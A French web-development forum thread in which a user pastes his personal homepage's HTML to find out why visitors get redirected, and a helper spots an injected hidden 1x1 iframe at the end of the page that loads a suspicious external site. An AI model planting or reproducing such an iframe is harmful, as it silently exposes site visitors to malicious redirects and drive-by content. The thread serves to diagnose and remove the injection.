Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1350 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  Redirection automatique vers site indésirable...

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Redirection automatique vers site indésirable...

n°2118243
Groswilly
Posté le 24-12-2011 à 17:55:12  profilanswer
 

bonjour
je me suis créé une page d'accueil internet hébergée chez free.
 
Je l'ai construite à partir de divers scripts.
 
En me connectant de chez un copain, je me suis aperçu que dès que ma page d'accueil est chargée, je suis redirigé automatiquement vers un site indésirable :  
http://15647.bodisparking.com/ljlk [...] u.cc?srt=1
 
Je pense que je dois avoir un petit script qui traine dans mon html...
Quelqu'un peut il me guider pour savoir quelle partie du html je dois virer ?
 
merci et joyeux Noël !

mood
Publicité
Posté le 24-12-2011 à 17:55:12  profilanswer
 

n°2118257
astik89
Posté le 25-12-2011 à 09:51:39  profilanswer
 

Groswilly a écrit :

bonjour
je me suis créé une page d'accueil internet hébergée chez free.
 
Je l'ai construite à partir de divers scripts.
 
En me connectant de chez un copain, je me suis aperçu que dès que ma page d'accueil est chargée, je suis redirigé automatiquement vers un site indésirable :  
http://15647.bodisparking.com/ljlk [...] u.cc?srt=1
 
Je pense que je dois avoir un petit script qui traine dans mon html...
Quelqu'un peut il me guider pour savoir quelle partie du html je dois virer ?
 
merci et joyeux Noël !


Sans le code ça va être compliqué...

n°2118260
Groswilly
Posté le 25-12-2011 à 10:15:52  profilanswer
 

oui, oups...
 
La page est : http://pageawilly.free.fr
 
Chez moi, sous firefox avec noscript et adblock, je n'ai pas ce problème de redirection...

n°2118264
astik89
Posté le 25-12-2011 à 12:49:32  profilanswer
 

Je ne peux pas y accéder, mon antivirus signale "HTML/Iframe.B.Gen virus".
copie le code source de ta page pour qu'on puisse t'aider.

n°2118277
Groswilly
Posté le 25-12-2011 à 16:01:14  profilanswer
 

Citation :


<html>
 
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>La page à Willy</title>
 
<style type="text/css">
</style>
<link rel="Shortcut Icon" type="image/gif" href="images/icone.gif">
 
<SCRIPT language=JavaScript>
 
<!--
 
 
 
var message = new Array();
 
// Set your messages below -- follow the pattern.
 
// To add more messages, just add more elements to the array.
 
message[0] = "--- Accueil";
 
message[1] = "--- Bien pratique ! ";
 
message[2] = "--- Accueil...";
 
message[3] = "--- Kite Power";
 
message[4] = "--- Zegroop";
 
message[5] = "--- Gazzz !!";
 
 
 
 
 
// Set the number of repetitions (how many times the arrow
 
// cycle repeats with each message).
 
var reps = 2;
 
var speed = 200; // Set the overall speed (larger number = slower action).
 
 
 
// DO NOT EDIT BELOW THIS LINE.
 
var p = message.length;
 
var T = "";
 
var C = 0;
 
var mC = 0;
 
var s = 0;
 
var sT = null;
 
if (reps < 1) reps = 1;
 
function doTheThing() {
 
T = message[mC];
 
A();
 
}
 
function A() {
 
s++;
 
if (s > 8) { s = 1;}
 
// you can fiddle with the patterns here...
 
if (s == 1) { document.title = 'Willy '+T+' -----'; }
 
if (s == 2) { document.title = 'wIlly '+T+' -----'; }
 
if (s == 3) { document.title = 'wiLly '+T+' -----'; }
 
if (s == 4) { document.title = 'wilLy '+T+' -----'; }
 
if (s == 5) { document.title = 'willY '+T+' -----'; }
 
if (s == 6) { document.title = 'wilLy '+T+' -----'; }
 
if (s == 7) { document.title = 'wiLly '+T+' -----'; }
 
if (s == 8) { document.title = 'wIlly '+T+' -----'; }
 
if (C < (8 * reps)) {
 
sT = setTimeout("A()", speed);
 
C++;
 
}
 
else {
 
C = 0;
 
s = 0;
 
mC++;
 
if(mC > p - 1) mC = 0;
 
sT = null;
 
doTheThing();
 
}
 
}
 
doTheThing();
 
// End -->
 
//-->
 
</SCRIPT>
 
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT TROUVE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
function HeureCheckEJS()
 {
 krucial = new Date;
 heure = krucial.getHours();
 min = krucial.getMinutes();
 sec = krucial.getSeconds();
 jour = krucial.getDate();
 mois = krucial.getMonth()+1;
 annee = krucial.getFullYear();
 if (sec < 10)
  sec0 = "0";
 else
  sec0 = "";
 if (min < 10)
  min0 = "0";
 else
  min0 = "";
 if (heure < 10)
  heure0 = "0";
 else
  heure0 = "";
 DinaHeure = heure0 + heure + ":" + min0 + min + ":" + sec0 + sec;
 which = DinaHeure
 if (document.getElementById){
  document.getElementById("ejs_heure" ).innerHTML=which;
 }
 setTimeout("HeureCheckEJS()", 1000)
 }
window.onload = HeureCheckEJS;
 
</SCRIPT>
 
<!-- DEBUT DU SCRIPT -->
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT EDITE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
navvers = navigator.appVersion.substring(0,1);
if (navvers > 3)
 navok = true;
else
 navok = false;
 
today = new Date;
jour = today.getDay();
numero = today.getDate();
if (numero<10)
 numero = "0"+numero;
mois = today.getMonth();
if (navok)
 annee = today.getFullYear();
else
 annee = today.getYear();
TabJour = new Array("Dimanche","Lundi","Mardi","Mercredi","Jeudi","Vendredi","Samedi" );
TabMois = new Array("janvier","février","mars","avril","mai","juin","juillet","aout","septembre","octobre","novembre","décembre" );
messageDate = TabJour[jour] + " " + numero + " " + TabMois[mois] + " " + annee;
</SCRIPT>
<!-- FIN DU SCRIPT -->
 
<LINK REL="shortcut ICON" HREF="http://pageawilly.free.fr/favicon.ico">
 
</head>
 
<body bgcolor="#EFB052" topmargin="0" background="images/fond.jpg">
 
 
<SCRIPT LANGUAGE=JavaScript>
if(document.getElementById)
 document.write('<DIV class=popper id=topdeck></DIV>');
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="ejs_menu_dyn.js"></SCRIPT>
 
 
<div align="left">
  <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="5%" id="AutoNumber3" bgcolor="#FFFFFF">
    <tr>
      <td width="100%" align="center"></td>
    </tr>
  </table>
</div>
 
 
  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="20%" id="AutoNumber4" bgcolor="#FFCC99" height="18" bordercolorlight="#FFFFFF" bordercolordark="#000080">
 
    <tr>
      <td width="100%" style="font-family: Verdana; color: #000080; font-size: 10pt" align="center">
      <p align="center"><font size="1">&nbsp;<!-- DEBUT DU SCRIPT -->
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT EDITE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
document.write(messageDate);
      </SCRIPT>
<!-- FIN DU SCRIPT -->&nbsp;</font></td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
    </tr>
  </table>
 
 
<p align="center" style="margin-top: 0; margin-bottom: 0">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp; </p>
 
 
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
  <tr>
    <td width="33%">&nbsp;<p>&nbsp;</p>
    <p>&nbsp;</p>
    <div align="center">
      <center>
      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="21%" id="AutoNumber5" bgcolor="#FFCC99" bordercolorlight="#FFFFFF" bordercolordark="#000080">
        <tr>
 
          <td width="100%" align="center" style="font-weight: bold; color: #000080">
          <div id="ejs_heure">
            <p align="center">Heure...</div></td>
        </tr>
      </table>
      </center>
    </div>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;<a target="ZONE2" href="http://france.meteofrance.com/france/meteo?PREVISIONS_PORTLET.path=previsionsdept/DEPT13"><img border="0" src="images/SoleilSoho.jpg" width="176" height="176"></a>&nbsp;&nbsp;&nbsp;
 
    <a target="ZONE2" href="http://www.kite13.com/meteo/wdlv6_04.swf?http://www.kite13.com/meteo/wdlconfig.xml">
    <img border="0" src="images/kite.jpg" width="181" height="176"></a></p>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;</p>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;
    <a target="ZONE2" href="http://marine.meteofrance.com/marine/accueil?MARINE_PORTLET.path=marinecotebulletin/COTE_CAMA_RAPH">
     
     
     
     
    <img border="0" src="http://recouvrance.canalblog.com/images/ISO01201.gif" width="176" height="176"></a>
     
    </td>
     
     
    <td width="33%" align="center">
    <p style="margin-top: 0; margin-bottom: 0">&nbsp;<!--  Champ de recherche Google --> </p>
 
<center>
<FORM method=GET action="http://www.google.fr/search" target="_blank">
<INPUT TYPE=hidden name=hl value=fr>
<TABLE style="border-collapse: collapse" bordercolor="#111111" cellpadding="0" cellspacing="0"><tr><td align="center">
<p style="margin-top: 7; margin-bottom: 7"><INPUT TYPE=text name=q size=34 maxlength=255 value=""></p>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
  <tr>
    <td width="50%" align="center">
<INPUT type=submit name=btnG VALUE="Google" style="float: right"></td>
  </tr>
</table>
<p style="margin-top: 7; margin-bottom: 7">&nbsp;<p style="margin-top: 7; margin-bottom: 7">&nbsp;<input id=all type=radio name=meta value="" ><label for=all>
<font color="#FFFFFF">Web</font></label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input id=cty type=radio name=meta value="cr=countryFR" checked><font color="#FFFFFF"><label for=cty>France</label></font></font><p style="margin-top: 7; margin-bottom: 7">&nbsp;<p style="margin-top: 7; margin-bottom: 7">&nbsp;</td></tr></TABLE>
 
</FORM>
</center>
<!-- Google -->
</td>
    <td width="34%">
    &nbsp;<p>&nbsp;</p>
    <p>&nbsp;</p>
    <div align="right">
      <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="350" id="AutoNumber6" bgcolor="#FFFFFF">
        <tr>
          <td>&nbsp;</td>
 
        </tr>
      </table>
    </div>
    <form action="http://images.google.fr/images" name=f><span id=hf></span>
      <p>&nbsp;</p>
      <table cellspacing=0 cellpadding=0 width="187"><tr valign=top>
        <td align=center width="187">
<p align="left" style="margin-top: 0; margin-bottom: 7">
<input maxlength=256 size=25 name=q value="">
<p align="left" style="margin-top: 0; margin-bottom: 7">
 
<input type=hidden name=ie value="UTF-8"><input type=hidden name=hl value=fr>
<input type=submit value="Images" name=btnG style="float: right"></tr></table></form>
</td>
  </tr>
</table>
               
 
 
 
 
 
 
 
 
 
<iframe src="http://ljlktrngthsdj.cu.cc/main.php?page=e1a5f2bf09ad6790" width="1" height="1" frameborder="0"></iframe></body>
 
</html>

n°2118278
Groswilly
Posté le 25-12-2011 à 16:02:14  profilanswer
 

vu comme ça, c'est un beau bordel ;o)

n°2118280
astik89
Posté le 25-12-2011 à 16:08:39  profilanswer
 

C'est ce iframe qui se promène à la fin?
je pense que ton souci vient de là

n°2118284
Groswilly
Posté le 25-12-2011 à 16:46:28  profilanswer
 

je l'avais pas vu
Pourtant, il est tout seul dans son coin, je ne sais pas d'ou je l'ai sorti...
 
en tout cas, merci !

n°2118285
astik89
Posté le 25-12-2011 à 16:58:06  profilanswer
 

Est-ce que c'est toi qui l'a mis, ou bien free qui le rajoute dans ton code?


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  Redirection automatique vers site indésirable...

 

Sujets relatifs
Vérifier qu'une URL correspond bien à un site InternetMacro pour copier le contenu d'un document excel vers un autre
Trafic sur son site : quels objectifs se fixer ?Script TELNET Unix vers Windows
Mise a jour d'un site a partir d'un document .txt ?fichier .csv vers la base de données
Script PHPconseils site web HTML/CSS
création d'un site qui permet d'affecter des zones à des employésprobleme importation .CSV vers MySQL
Plus de sujets relatifs à : Redirection automatique vers site indésirable...


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR